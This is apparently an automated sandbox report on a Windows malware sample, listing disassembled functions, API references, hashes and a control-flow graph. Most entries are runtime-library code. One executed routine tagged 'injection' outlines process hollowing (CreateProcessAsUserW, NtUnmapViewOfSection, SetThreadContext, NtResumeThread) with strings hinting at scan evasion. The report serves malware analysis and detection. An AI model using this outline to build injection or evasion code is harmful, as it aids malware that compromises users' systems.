                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                      • String ID: 1.2.3
                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                      Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                      Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                        • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                        • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                      • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                                      • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                                      • __recalloc.LIBCMT ref: 00401828
                                                                                                                                      • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                                      • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                                      • _calloc.LIBCMT ref: 00401861
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1721462702-0
                                                                                                                                      • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                      • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                      • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                      • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                      Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                      • String ID: @.B
                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                      Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2805327698-0
                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                      Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                      • InterlockedIncrement.KERNEL32(31B11688), ref: 00414050
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                      Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                      Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                      Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                      Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                      Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                      Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

                                                                                                                                      Executed Functions

                                                                                                                                      Function 02DC8BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 6798 2dc8bb0-2dc8bb3 6799 2dc8bb8-2dc8bbd 6798->6799 6799->6799 6800 2dc8bbf-2dc8ca6 call 2db493c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 6799->6800 6831 2dc8cac-2dc8d87 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 6800->6831 6832 2dca6f7-2dca761 call 2db44d0 * 2 call 2db4c0c call 2db44d0 call 2db44ac call 2db44d0 * 2 6800->6832 6831->6832 6875 2dc8d8d-2dc90b5 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db30d4 * 2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db4d8c call 2db4d9c call 2dc85dc 6831->6875 6984 2dc9128-2dc9449 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db46a4 * 2 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2ee0 call 2db2f08 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 GetThreadContext 6875->6984 6985 2dc90b7-2dc9123 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 6875->6985 6984->6832 7093 2dc944f-2dc96b2 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8254 6984->7093 6985->6984 7166 2dc99bf-2dc9a2b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7093->7166 7167 2dc96b8-2dc9821 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc84c4 7093->7167 7194 2dc9a30-2dc9bb0 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 7166->7194 7257 2dc984b-2dc98b7 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7167->7257 7258 2dc9823-2dc9849 call 2dc79b4 7167->7258 7194->6832 7298 2dc9bb6-2dc9caf call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc8ac0 7194->7298 7267 2dc98bc-2dc99b3 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc79b4 7257->7267 7258->7267 7337 2dc99b8-2dc99bd 7267->7337 7349 2dc9cb1-2dc9cfe call 2dc89b8 call 2dc89ac 7298->7349 7350 2dc9d03-2dca45b call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc7d00 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 SetThreadContext NtResumeThread call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2db2c2c call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 call 2dc87a0 * 3 call 2db480c call 2db494c call 2db46a4 call 2db4798 call 2db494c call 2db46a4 call 2dc8824 7298->7350 7337->7194 7349->7350 7575 2dca460-2dca6f2 call 2dc87a0 * 2 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 * 5 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2db480c call 2db494c call 2db4798 call 2db494c call 2dc87a0 call 2dc7ed4 call 2dc87a0 * 2 7350->7575 7575->6832
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02DC8824: FreeLibrary.KERNEL32(02E11384,00000000,02E11388,Function_000055D8,00000004,02E11398,02E11388,05F5E0FF,00000040,02E1139C,02E11384,00000000,00000000,00000000,00000000,02DC890B), ref: 02DC88EB
                                                                                                                                        • Part of subcall function 02DC85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8668
                                                                                                                                      • GetThreadContext.KERNEL32(02E113D0,02E11420,ScanString,02E113A4,02DCA77C,UacInitialize,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,ScanBuffer,02E113A4,02DCA77C,UacInitialize,02E113A4), ref: 02DC9442
                                                                                                                                        • Part of subcall function 02DC8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC82C5
                                                                                                                                        • Part of subcall function 02DC84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC8529
